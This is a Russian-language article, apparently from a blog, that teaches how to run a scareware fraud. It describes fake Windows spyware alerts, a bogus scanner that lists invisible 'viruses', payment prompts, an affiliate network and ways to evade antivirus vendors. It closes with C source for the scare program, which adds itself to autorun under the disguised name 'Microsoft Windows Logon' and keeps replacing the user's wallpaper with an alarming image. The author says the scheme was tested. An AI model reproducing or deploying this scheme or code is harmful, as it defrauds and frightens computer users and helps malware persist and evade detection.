В последнее время интернет захлестнула волна разного рода анти-спайварных программ. И часть из них действительно очищает компьютеры пользователей от adware, trojans и др. malware. Понятное дело – чтобы создать полноценный антиспайварный продукт нужно приложить немало усилий, времени, денег. А что если денег хочется много и сейчас – «хапнуть деньжат и смыться на Канары»? Правильно – можно сделать программу, которая лишь имитирует «лечение» компьютера. Эти имитаторы именуются красивым английским словом – «Hoax».
Каким образом можно всучить по сути бесполезную программу пользователю, да ещё сделать так, чтобы он заплатил? Есть пара вариантов.
Первый вариант. Делается очень красивый интерфейс пользователя (со всякими психологическими уловками заставляющими пользователя чувствовать себя комфортно, глядя на запущенную программу – сочетание разных цветов, градиентов, элементов псевдо-3D-интерфейса … в общем, чтобы выглядело как последний Майкрософтский Офис 
). После этого создается куча блогов, на которых расхваливается новый «мега» продукт, постинги в форумах, покупка рекламы в поисковиках – в общем стандартная раскрутка. Но времени и денег на всё это уйдет уйма.
Второй вариант. Делается программа, которая выводит тревожные сообщения о том, что система, якобы, заражена неким куль-хацкерским трояном и, что единственным способом избавиться от этого трояна – это скачать и запустить нашу мега-анти-спайварную программу.
Например:
——–
ОШИБКА В РАБОТЕ WINDOWS !
В системе обнаружена Spyware активность. Часть системных функций заблокирована.
Windows рекомендует вам очистить компьютер от Spyware. В противном случае пользовательские данные могут быть повреждены или удалены!
Список рекомендуемых утилит для удаления Spyware:
* StopAdWare – http://www.stop-ad-ware.com/
* AdAware – http://lavasoft.com
* SpyBot Search & Destroy – http://www.safer-networking.org/
——–
Пользователь скачивает и запускает мега-анти-спайварную программу, сканирует компьютер, программа выдаёт список «вирусов», якобы обнаруженных в системе. Понятно, что никаких вирусов нет и в помине;-) Список «вирусов» выдаётся без путей к ним – пользователю нельзя позволить проверить действительно ли есть хоть один из «вирусов» в системе. Пользователь напуган – это то, что нужно. Он пытается «вылечить» свой компьютер, нажав на кнопку «Удалить вирусы», но тут выскакивает окошко, которое вещает – «Купите ключ, чтобы снять ограничения в работе программы и удалить все вирусы» (ну или что-то типа этого). Дальше открывается браузер с сайтом на котором указана цена на «Анти-Спайвару», способы оплаты, контактные данные (на случай, если пользователь захочет пообщаться с сапортом).
Чтобы распространить как можно больше «программ-пугалок» нужно создать партнерку по распространению софта. Под каждого партнёра делается уникальная пара программ: программа-пугалка, и Анти-Спайвара. У каждой из этих двух программ есть уникальный идентификатор партнёра, по которому можно вести статистику инсталляций/покупок. Можно платить или за инсталляции, или за покупки.
Чтобы обезопасить себя от наездов антивирусников можно встроить в Анти-Спайвару удаление не только программы-пугалки с компьютера пользователя, но и нескольких других malware. В этом случае создатель Анти-Спайвары сможет «качать права», если вдруг сигнатуру Анти-Спайвары занесут в свои базы антивирусники 
Программу уже будет нельзя квалифицировать как обман, ведь она удаляет несколько разных malware. В случае чего можно даже и в суд подать на антивирусников.
Исходники Программы-пугалки – меняет обои в компьютере пользователя на нашу картинку, каждый раз когда пользователь включает компьютер.
#define _WIN32_IE 0×0400
#include
#include
#include
char pfad[MAX_PATH];
void Registry(void) // вписываем в автозапуск
{
HKEY hKey = HKEY_CURRENT_USER;
LPCTSTR lpSubKey =»Software\\Microsoft\\Windows\\CurrentVersion\\Run»;
DWORD dwType = REG_SZ;
HKEY key;
RegOpenKeyEx(hKey, lpSubKey, 0, KEY_WRITE, &key);
GetModuleFileName(NULL, pfad, MAX_PATH);
RegSetValueEx(key, «Microsoft Windows Logon», 0, REG_SZ, (LPBYTE)pfad, strlen(pfad));
}
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
Registry();
if(DeleteFile(«1.dll»))
return 0;
else
{
while(true)
{
HRSRC hResource;
DWORD dwAdzealotSize;
DWORD dwTemp;
HANDLE hFile = CreateFile(«winerror.jpg»,GENERIC_READ|GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,0,CREATE_ALWAYS,FILE_ATTRIBUTE_HIDDEN,0);
if(hFile != INVALID_HANDLE_VALUE)
{
hResource = FindResource(0,MAKEINTRESOURCE(103),»FILE»);
dwAdzealotSize = SizeofResource(0,hResource);
WriteFile(hFile,LockResource(LoadResource(0,hResource)),dwAdzealotSize,&dwTemp,0);
CloseHandle(hFile);
}
// TODO: Place code here.
HRESULT hr=CoInitialize(0);
IActiveDesktop *pActiveDesktop;
//Create an instance of the Active Desktop
hr = CoCreateInstance(CLSID_ActiveDesktop, NULL, CLSCTX_INPROC_SERVER,
IID_IActiveDesktop, (void**)&pActiveDesktop);
//Insert code to call the IActiveDesktop methods
WALLPAPEROPT wo;
wo.dwSize=sizeof(wo);
wo.dwStyle=WPSTYLE_CENTER ;
hr=pActiveDesktop->SetWallpaper(L»winerror.jpg»,0);
hr=pActiveDesktop->SetWallpaperOptions(&wo,0);
hr=pActiveDesktop->ApplyChanges(AD_APPLY_ALL);
// Call the Release method
pActiveDesktop->Release();
CoUninitialize();
Sleep(30000);
}
}
return 0;
}
То, что написано в статье проверено – результат был;)
